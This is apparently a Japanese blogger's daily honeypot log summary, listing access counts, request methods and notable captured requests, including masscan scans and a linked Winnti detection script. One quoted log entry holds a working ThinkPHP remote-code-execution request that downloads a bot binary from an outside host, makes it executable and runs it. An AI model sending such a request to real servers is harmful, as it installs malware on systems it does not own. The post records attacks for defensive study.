2019-04-06のアクセス数は50件でした。
■送信元IPアドレスの数は 44件です。
■メソッドの種別は以下です。
GET・・47件 PUT・・0件 POST・・2件 HEAD・・1件 CONNECT・・0件 PROFFIND・・0件 その他・・0件
気になるlog
19件目。thinkPHPの脆弱性からのマルウェアダウンロード。
[2019-04-06 09:32:40+0900] 189.163.142.93 127.0.0.1:80 "GET /index.php? GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://love.thotiana.live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp HTTP/1.1 Host: 127.0.0.1 User-Agent: WOW Accept: */* Accept-Language: en-US,en;q=0.8 Connection: Keep-Alive
また来てますね!IPアドレスは違います。
44~45件目。masscan!
[2019-04-06 20:29:46+0900] 104.152.52.30 blank:80 "GET / HTTP/1.0" 200 False GET / HTTP/1.0 User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan) Accept: */* [2019-04-06 20:33:40+0900] 104.152.52.30 blank:80 "GET / HTTP/1.0" 200 False GET / HTTP/1.0 User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan) Accept: */*
User-Agentにgit-hubのソースまであるやん、素人が間違えて2回実行したんだろうな、と思ってIPアドレスを調べてみたら、定期的にscanする組織の通信だった。
世の中には様々な組織があるんだなぁ。勉強になる。
調査系の通信について
上記のmasscanの件で、理解を深めておく必要があると感じました。
twitterでwinnti感染有無を調べるcodeが流れていたので紹介しておきます。
https://github.com/TKCERT/winnti-nmap-script
動かしてキャプチャしてみたが、httpではないため、このhoneypotではキャプチャできなかった。